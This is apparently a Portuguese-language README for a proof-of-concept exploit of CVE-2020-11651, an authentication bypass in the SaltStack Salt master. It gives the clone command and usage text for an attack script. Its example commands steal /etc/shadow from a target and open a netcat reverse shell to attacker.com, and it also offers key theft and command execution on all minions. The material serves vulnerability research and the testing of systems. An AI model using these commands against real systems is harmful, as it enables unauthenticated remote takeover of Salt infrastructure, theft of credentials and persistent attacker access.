
CVE-2020-11651: Prova de Conceito
Foi descoberto um problema no SaltStack Salt anterior às versões 2019.2.4 e 3000 anterior à 3000.2. A classe ClearFuncs do processo salt-master não valida corretamente as chamadas de método. Isso permite que um usuário remoto acesse alguns métodos sem autenticação. Esses métodos podem ser usados para recuperar tokens de usuário do salt master e/ou executar comandos arbitrários nos salt minions.
Correções para versões não suportadas do Salt
git clone https://github.com/0xc0d/CVE-2020-11651.git ~/CVE-2020-11651
chmod +x ~/CVE-2020-11651/PoC.py
$ ~/CVE-2020-11651/PoC.py -h
usage: PoC.py [-h] --host HOST [--port PORT] [--execute COMMAND] [--upload src dest] [--download src dest] [--minions] [--quiet] [--fetch-key-only]
CVE-2020-11651 PoC
optional arguments:
-h, --help Exibe esta mensagem de ajuda e sai
--host HOST, -t HOST
--port PORT, -p PORT
--execute COMMAND, -e COMMAND
Comando a executar. Padrão: /bin/sh (use netcat para reverse shell)
--upload src dest, -u src dest
Enviar um arquivo
--download src dest, -d src dest
Baixar um arquivo
--minions Enviar comando para todos os minions no master
--quiet, -q Ativa o modo silencioso
--fetch-key-only Apenas obter a chave
./PoC.py --host target.com --download /etc/shadow ./shadow
nc -nvl attacker.com 9999
./PoC.py --host target.com --execute "nc attacker.com 9999 -e \"/bin/sh\""
./PoC.py --host target.com --fetch-key-only